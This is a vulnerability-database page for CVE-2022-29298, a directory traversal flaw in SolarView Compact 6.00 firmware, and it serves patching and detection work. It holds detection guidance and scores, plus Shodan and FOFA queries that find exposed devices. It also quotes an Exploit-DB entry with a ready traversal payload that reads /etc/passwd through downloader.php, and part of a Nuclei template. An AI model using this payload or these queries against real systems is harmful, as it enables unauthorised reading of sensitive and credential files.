CVE-2022-29298
published 2022-05-12CVE-2022-29298: SolarView Compact ver.6.00 allows attackers to access sensitive files via directory traversal.
PriorityP268high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
44.54%
98.6th percentile
SolarView Compact ver.6.00 allows attackers to access sensitive files via directory traversal.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| contec | sv-cpt-mc310_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
sigma↗
GET request to /downloader.php with file parameter containing '../' and '%00'
- →The vulnerable endpoint is 'downloader.php'. Monitor HTTP GET requests to this path containing directory traversal sequences ('../') combined with a null-byte injection ('%00') and a fake image extension ('.jpg') to bypass file-type filters. ↗
- →No authentication is required to exploit this vulnerability. Any unauthenticated GET request to /downloader.php with a traversal payload should be treated as an active exploitation attempt. ↗
- →Successful exploitation returns HTTP 200 with the body matching 'root:.*:0:0:', indicating /etc/passwd content was disclosed. Alert on responses from /downloader.php containing this pattern. ↗
- →Use Shodan/FOFA queries to identify exposed SolarView Compact instances: Shodan 'http.html:"SolarView Compact"' and FOFA 'body="solarview compact"'. ↗
- ·The exploit targets specifically SolarView Compact version 6.00 (firmware cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00). Detections should be scoped to this version; other versions may not be vulnerable. ↗
- ·The null-byte injection ('%00') is used to truncate the appended '.jpg' extension server-side, allowing arbitrary file reads. Detection rules must account for URL-encoded null bytes in the 'file' parameter. ↗
- ·The EPSS score is 0.82294 (99.2nd percentile), indicating this vulnerability is very likely being actively exploited in the wild. Prioritize detection and patching accordingly. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SolarView Compact 6.00 - Directory Traversal
exploitdb·2022-06-03·CVSS 7.5
CVE-2022-29298 [HIGH] SolarView Compact 6.00 - Directory Traversal
SolarView Compact 6.00 - Directory Traversal
---
# Exploit Title: SolarView Compact 6.00 - Directory Traversal
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29298
# Tested on: Windows
# Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg
Nuclei
SolarView Compact 6.00 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2022-29298 [HIGH] SolarView Compact 6.00 - Local File Inclusion
SolarView Compact 6.00 - Local File Inclusion
SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.
Template:
id: CVE-2022-29298
info:
name: SolarView Compact 6.00 - Local File Inclusion
author: ritikchaddha
severity: high
description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
remediation: |
Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in SolarView Compact 6.00.
reference:
- https://www.exploit-db.com/exploits/50950
- https://drive.
http://packetstormsecurity.com/files/167383/SolarView-Compact-6.00-Directory-Traversal.htmlhttps://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharinghttp://packetstormsecurity.com/files/167383/SolarView-Compact-6.00-Directory-Traversal.htmlhttps://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing
2022-05-12
Published